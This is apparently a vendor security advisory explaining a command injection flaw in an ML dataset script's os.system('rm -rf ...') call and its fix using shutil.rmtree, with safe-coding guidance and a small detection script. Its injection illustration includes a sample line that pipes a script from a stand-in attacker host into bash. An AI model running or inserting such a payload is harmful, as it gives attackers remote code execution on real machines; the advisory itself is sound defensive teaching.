Severity: critical · 8 min read

How command injection happens in Python os.system() and how to fix it

A critical command injection vulnerability was discovered in the `data/xView.yaml` dataset download script, where `os.system(f'rm -rf {labels}')` constructed a shell command using an f-string with a path derived from user-controlled YAML configuration. An attacker supplying a crafted dataset YAML file could embed shell metacharacters in the path to execute arbitrary commands. The fix replaces the shell invocation entirely with Python's `shutil.rmtree()`, eliminating the attack surface by never i

By Orbis AppSec
Published June 9, 2026 · Reviewed June 9, 2026

Answer Summary

This is a command injection vulnerability (CWE-78) in Python, found in `data/xView.yaml` at line 102. The vulnerable pattern `os.system(f'rm -rf {labels}')` passes a user-influenced path directly into a shell command via an f-string, allowing shell metacharacters to execute arbitrary commands. The fix replaces `os.system()` with `shutil.rmtree()` and `labels.unlink()`, which are pure Python filesystem operations that never invoke a shell and therefore cannot be exploited via shell metacharacter injection.

Vulnerability at a Glance

CWE: CWE-78
Fix: Replaced os.system() shell invocation with shutil.rmtree() and Path.unlink(), eliminating shell interpretation entirely
Risk: Arbitrary command execution on the host machine when processing attacker-controlled YAML dataset configuration
Language: Python
Root cause: User-influenced path variable interpolated directly into an os.system() shell command via an f-string without sanitization
Vulnerability: OS Command Injection via f-string in os.system()


Summary

A critical command injection vulnerability was found in the data/xView.yaml dataset download script used by a machine learning pipeline. The culprit: a single line — os.system(f'rm -rf {labels}') — that handed a user-influenced filesystem path directly to the shell. An attacker who controls the YAML configuration file could inject shell metacharacters into the labels path and achieve arbitrary command execution on the host machine. The fix is clean and decisive: throw out the shell call entirely and use Python's native filesystem APIs instead.


Introduction

The data/xView.yaml file defines how the xView aerial imagery dataset is downloaded and prepared for training. Buried inside its embedded Python download script, at line 102, was this line:

os.system(f'rm -rf {labels}')

The labels variable is a pathlib.Path object constructed from a base path that originates in the YAML configuration itself:

labels = Path(path / 'labels' / 'train')

Because path is derived from user-supplied or user-modifiable configuration, an attacker who can influence the YAML file can influence labels — and therefore influence the shell command that gets executed. This is the textbook definition of OS command injection (CWE-78), and it carries a critical severity rating because exploitation requires only the ability to supply a crafted dataset YAML file, which is a completely normal and expected operation when training on custom datasets.


The Vulnerability Explained

What went wrong

Python's os.system() passes its argument to the system shell (/bin/sh on Unix). When you use an f-string to build that argument, you're constructing a shell command string — and the shell will interpret every metacharacter in that string.

The vulnerable line:

os.system(f'rm -rf {labels}')

If labels evaluates to /path/to/project/labels/train, this becomes:

rm -rf /path/to/project/labels/train

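Perfectly harmless. But suppose an attacker controls the base path so that the rendered labels string looks something like this (simplified; the real value would also carry the appended /labels/train suffix):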

/tmp/labels; curl http://attacker.com/shell.sh | bash

The resulting shell command becomes:

rm -rf /tmp/labels; curl http://attacker.com/shell.sh | bash

The shell executes both commands. The ; metacharacter acts as a command separator, and the attacker's payload runs with the same privileges as the Python process.
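The interpolation step can be reproduced without running anything. The sketch below only builds the string that os.system() would receive and never executes it. The names render_command, has_shell_metacharacters, and the sample base paths are hypothetical, chosen for illustration, and PurePosixPath is used so the rendering is the same on any platform.

```python
from pathlib import PurePosixPath

# A few characters that /bin/sh treats as syntax rather than data (not exhaustive).
SHELL_METACHARACTERS = set(';|&$`<>(){}\n')


def render_command(base):
    """Build the string os.system() would hand to the shell (never executed here)."""
    labels = PurePosixPath(base) / 'labels' / 'train'
    return f'rm -rf {labels}'


def has_shell_metacharacters(command):
    """Report whether the command string contains any listed metacharacter."""
    return any(ch in SHELL_METACHARACTERS for ch in command)


benign = render_command('/data/xView')
# Hypothetical hostile base path: ';' ends the rm command, and ' #' turns the
# appended '/labels/train' suffix into a shell comment.
hostile = render_command('/tmp/x; echo INJECTED #')

print(benign)
print(hostile)
print(has_shell_metacharacters(benign), has_shell_metacharacters(hostile))
```

A check like has_shell_metacharacters is useful for seeing the problem, not for fixing it. A denylist of characters is easy to get wrong, which is why the fix described later removes the shell instead.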

Realistic attack scenarios

Scenario 1 — Malicious dataset distribution:
An attacker publishes a modified xView.yaml (or a custom dataset YAML that follows the same pattern) on a public repository or model hub. A researcher downloads it and runs the training pipeline. The download script executes, and the injected command runs silently alongside the legitimate rm -rf.

Scenario 2 — Supply chain attack:
In a CI/CD pipeline that automatically fetches dataset configurations, a compromised upstream YAML file triggers command execution on the build server, potentially exfiltrating secrets or installing backdoors.

Scenario 3 — Local privilege escalation:
In a shared compute environment (e.g., a university GPU cluster), a user places a crafted YAML in a shared directory. Another user with higher privileges runs training, and the injected command executes under their account.

Why f-strings make this worse

An f-string gives the appearance of clean, readable code — there's no obvious string concatenation that might trigger a code reviewer's instinct. But f'rm -rf {labels}' is functionally identical to 'rm -rf ' + str(labels) from the shell's perspective. Both produce a single string that the shell will parse and execute in full, metacharacters and all.
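As a quick illustration of that equivalence, the snippet below builds the same command four ways and compares the results. The labels value is a made-up example, and nothing is executed.

```python
# Hypothetical tainted value, for illustration only.
labels = '/tmp/x; echo INJECTED'

as_fstring = f'rm -rf {labels}'
as_concat = 'rm -rf ' + str(labels)
as_format = 'rm -rf {}'.format(labels)
as_percent = 'rm -rf %s' % labels

# Every formatting style yields the same single string for the shell to parse.
all_equal = as_fstring == as_concat == as_format == as_percent
print(all_equal)
```

Whichever style a codebase uses, the review question is the same: does a dynamic value end up inside a string that a shell will parse?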


The Fix

The fix is elegant because it doesn't try to sanitize the input — it eliminates the shell entirely.

Before (vulnerable)

import os
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
os.system(f'rm -rf {labels}')
labels.mkdir(parents=True, exist_ok=True)

After (fixed)

import shutil
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
if labels.is_symlink() or labels.is_file():
    labels.unlink()
else:
    shutil.rmtree(labels, ignore_errors=True)
labels.mkdir(parents=True, exist_ok=True)

Why this fix works

1. No shell is ever invoked.
shutil.rmtree() and Path.unlink() are pure Python functions that make direct system calls. There is no shell process, no shell parsing, and therefore no opportunity for shell metacharacter injection. It doesn't matter what characters are in labels — they're treated as a literal filesystem path, not as a shell command string.

2. The import os is replaced with import shutil.
This is a meaningful signal: the fix doesn't just patch the dangerous call — it removes the dependency that enabled it. os.system() is no longer available in this script's namespace.

3. Symlink and file edge cases are handled explicitly.
The fix distinguishes between symlinks/files (labels.unlink()) and directories (shutil.rmtree()). The original rm -rf handled both implicitly. In Python the distinction has to be explicit, because shutil.rmtree() only removes directory trees and refuses to operate on a symbolic link.

4. ignore_errors=True preserves the original intent.
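The original rm -rf silently succeeds even if the path doesn't exist, and os.system() discarded its exit status anyway. shutil.rmtree(labels, ignore_errors=True) matches that behavior. Note that ignore_errors=True suppresses every deletion error, including permission failures, so code that needs to notice those should catch FileNotFoundError explicitly instead.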
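To see the "literal filesystem path" point in practice, here is a minimal sketch that wraps the fixed logic in a helper and runs it against a directory whose name contains shell metacharacters. The helper name reset_dir and the directory name are hypothetical; the body mirrors the fixed snippet above.

```python
import shutil
import tempfile
from pathlib import Path


def reset_dir(target):
    """Delete whatever is at target, then recreate it as an empty directory."""
    target = Path(target)
    if target.is_symlink() or target.is_file():
        target.unlink()
    else:
        shutil.rmtree(target, ignore_errors=True)
    target.mkdir(parents=True, exist_ok=True)
    return target


with tempfile.TemporaryDirectory() as tmp:
    workdir = Path(tmp)
    # A directory name that would inject a command if it ever reached a shell.
    hostile = workdir / 'x; touch pwned' / 'labels' / 'train'
    hostile.mkdir(parents=True)
    (hostile / 'stale.txt').write_text('old label')

    reset_dir(hostile)

    # Only the oddly named directory exists; no file called 'pwned' was created.
    survivors = sorted(p.name for p in workdir.iterdir())
    is_empty = not any(hostile.iterdir())

print(survivors, is_empty)
```

The semicolon is just another byte in a directory name here, so the stale file is removed and nothing else happens.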


Prevention & Best Practices

Never use os.system() with dynamic input

os.system() should be treated as a code smell in modern Python. It offers no argument separation, no output capture, and no protection against injection. The Python docs themselves recommend subprocess as a replacement — but even subprocess is dangerous with shell=True.

Pattern | Safe? | Notes
os.system(f'rm -rf {path}') | No | Shell injection, no output capture
subprocess.run(f'rm -rf {path}', shell=True) | No | Same shell injection risk
subprocess.run(['rm', '-rf', str(path)]) | Yes | No shell, args passed directly
shutil.rmtree(path) | Yes | Best: no subprocess at all
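The difference between a command string and an argument list can be checked safely. The sketch below passes a hostile value to a child Python process as a list element and has the child print its argument back. The child program and the hostile string are illustrative assumptions, and no rm is involved.

```python
import subprocess
import sys

# Hypothetical hostile value; with a shell this would run a second command.
hostile = '/tmp/x; echo INJECTED'

# The child simply prints its first argument back to us.
child_code = 'import sys; print(sys.argv[1])'

result = subprocess.run(
    [sys.executable, '-c', child_code, hostile],  # list form: no shell involved
    capture_output=True,
    text=True,
    check=True,
)
echoed = result.stdout.rstrip('\n')
print(echoed == hostile)
```

The child receives the whole string as a single argument, semicolon included. The list form removes shell parsing, but the called program still interprets its own arguments, so a value beginning with - may be read as an option. Many tools accept -- to mark the end of options.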

Prefer native Python filesystem APIs

For filesystem operations, Python's standard library almost always has a safe equivalent:

import shutil
from pathlib import Path

# Instead of: os.system('rm -rf /some/path')
shutil.rmtree('/some/path', ignore_errors=True)

# Instead of: os.system('cp src dst')
shutil.copy2(src, dst)

# Instead of: os.system('mkdir -p /some/path')
Path('/some/path').mkdir(parents=True, exist_ok=True)

# Instead of: os.system('mv src dst')
shutil.move(src, dst)  # unlike Path.rename(), also works across filesystems

Use shlex.quote() as a last resort

If you absolutely must pass a path to a shell command, use shlex.quote() to escape it:

import shlex
import subprocess

# If you truly cannot avoid a shell call:
safe_path = shlex.quote(str(labels))
subprocess.run(f'some-tool --input {safe_path}', shell=True, check=True)

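shlex.quote() returns the string unchanged if it contains only safe characters; otherwise it wraps the string in single quotes and escapes any internal single quotes, preventing shell interpretation. It targets POSIX shells only, so it offers no protection for cmd.exe on Windows. This should be a last resort: the preferred solution is always to avoid the shell entirely.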
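A short look at what shlex.quote() returns for a few inputs makes the quoting rule concrete. The input strings are examples only, and nothing is passed to a shell.

```python
import shlex

# Only "safe" characters: returned unchanged.
plain = shlex.quote('/data/xView/labels/train')

# Contains spaces, ';' and '|': wrapped in single quotes so the shell sees one word.
hostile = shlex.quote('/tmp/labels; curl http://attacker.com/shell.sh | bash')

# An embedded single quote is closed, emitted inside double quotes, then reopened.
with_quote = shlex.quote("it's")

print(plain)
print(hostile)
print(with_quote)
```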

Audit YAML-embedded scripts

Dataset configuration files that embed executable Python scripts (a pattern used by several ML frameworks) deserve special security scrutiny. Any path, URL, or string value that flows from YAML configuration into a shell command is a potential injection point. When reviewing such files, trace every variable that touches os.system(), subprocess, or eval().
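Part of that tracing can be automated. The following is a rough sketch, not a substitute for a real static analyzer: it walks the syntax tree of a script with Python's ast module and flags os.system()/os.popen() calls with non-literal arguments, subprocess calls with shell=True, and eval()/exec(). The function name find_risky_calls and the sample script are hypothetical. For a YAML-embedded script, the assumption is that you first extract the script text (for example, the value of the download key) with a YAML parser.

```python
import ast


def find_risky_calls(source):
    """Return sorted (line, reason) pairs for shell-invoking or eval-style calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in {'eval', 'exec'}:
            findings.append((node.lineno, f'{func.id}() call'))
        elif isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            module, name = func.value.id, func.attr
            if module == 'os' and name in {'system', 'popen'}:
                # A literal command is lower risk; an f-string or variable is not.
                if any(not isinstance(arg, ast.Constant) for arg in node.args):
                    findings.append((node.lineno, f'os.{name}() with non-literal argument'))
            elif module == 'subprocess':
                for kw in node.keywords:
                    if (kw.arg == 'shell' and isinstance(kw.value, ast.Constant)
                            and kw.value.value is True):
                        findings.append((node.lineno, f'subprocess.{name}() with shell=True'))
    return sorted(findings)


# Hypothetical script text; it is parsed, never executed.
sample = '''\
import os, subprocess
os.system(f'rm -rf {labels}')
os.system('ls')
subprocess.run(cmd, shell=True)
subprocess.run(['rm', '-rf', str(path)])
'''

findings = find_risky_calls(sample)
for line, reason in findings:
    print(line, reason)
```

This only matches direct module.function spellings, so aliased imports such as from os import system would slip through. Treat a clean result as a starting point for manual review rather than proof of safety.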

Relevant standards

  • CWE-78: Improper Neutralization of Special Elements used in an OS Command
  • OWASP A03:2021: Injection — command injection is explicitly covered
  • OWASP OS Command Injection Defense Cheat Sheet: recommends avoiding shell calls and using language-native APIs

Key Takeaways

  • os.system() with an f-string is always dangerous when the interpolated value is user-influenced — in this case, the labels path in xView.yaml was directly derived from YAML configuration that any user can modify.
  • The path value from the YAML configuration was the taint source: it flowed through the labels variable into os.system() without any sanitization or quoting.
  • Replacing os.system() with shutil.rmtree() is not just a patch — it's a structural fix that makes injection impossible by design, regardless of what the path contains.
  • YAML files that embed executable scripts are an underappreciated attack surface in ML pipelines; every dynamic value that reaches a shell call must be treated as potentially attacker-controlled.
  • shutil.rmtree() with ignore_errors=True, paired with Path.unlink() for symlinks and regular files, reproduces the behavior of rm -rf with zero shell involvement; rmtree() on its own only removes directory trees.

How Orbis AppSec Detected This

  • Source: The path variable derived from YAML dataset configuration in data/xView.yaml, which flows into labels = Path(path / 'labels' / 'train')
  • Sink: os.system(f'rm -rf {labels}') at data/xView.yaml:102 — a shell-invoking function receiving an f-string built from the tainted labels variable
  • Missing control: No shell escaping (e.g., shlex.quote()), no input validation, and no use of shell-free filesystem APIs before the value reached os.system()
  • CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
  • Fix: Replaced os.system(f'rm -rf {labels}') with shutil.rmtree(labels, ignore_errors=True) and labels.unlink(), removing the shell invocation entirely

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.


Conclusion

A single line — os.system(f'rm -rf {labels}') — was enough to introduce a critical command injection vulnerability into an ML dataset pipeline. The root cause isn't exotic: it's the combination of a shell-invoking function and an f-string built from user-influenced data, a pattern that appears frequently in data science and ML codebases where shell commands are used as quick shortcuts for filesystem operations.

The fix demonstrates the right mental model: when you need to delete a directory in Python, reach for shutil.rmtree(), not os.system('rm -rf ...'). The Python standard library has safe, shell-free equivalents for virtually every common filesystem operation. Using them doesn't just fix a vulnerability — it makes the entire class of shell injection attacks structurally impossible in that code path.

If you maintain ML pipelines that use YAML-embedded download scripts, this is a good moment to audit every call to os.system(), subprocess.run(..., shell=True), and eval() and ask: does any user-controlled value reach this call? If the answer is yes, the shell needs to go.



Frequently Asked Questions

What is command injection in Python?

Command injection occurs when user-controlled data is embedded in a shell command string (e.g., via os.system() or subprocess with shell=True) without sanitization, allowing attackers to append shell metacharacters like `;`, `|`, or `&&` to execute arbitrary commands.

How do you prevent command injection in Python?

Avoid os.system() and shell=True entirely. Use Python's built-in filesystem functions like shutil.rmtree(), pathlib.Path.unlink(), or subprocess with a list of arguments (no shell=True) so the shell is never invoked.

What CWE is command injection?

Command injection is CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").

Is input validation enough to prevent command injection in Python?

Input validation (e.g., allowlisting characters) reduces risk but is fragile and error-prone. The safest approach is to eliminate the shell call entirely using native Python APIs like shutil, which makes injection structurally impossible regardless of input.

Can static analysis detect command injection in Python?

Yes. Tools like Semgrep, Bandit, and multi-agent AI scanners can detect patterns like os.system() with f-strings or string concatenation. Orbis AppSec's scanner flagged this exact pattern in xView.yaml automatically.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #13773
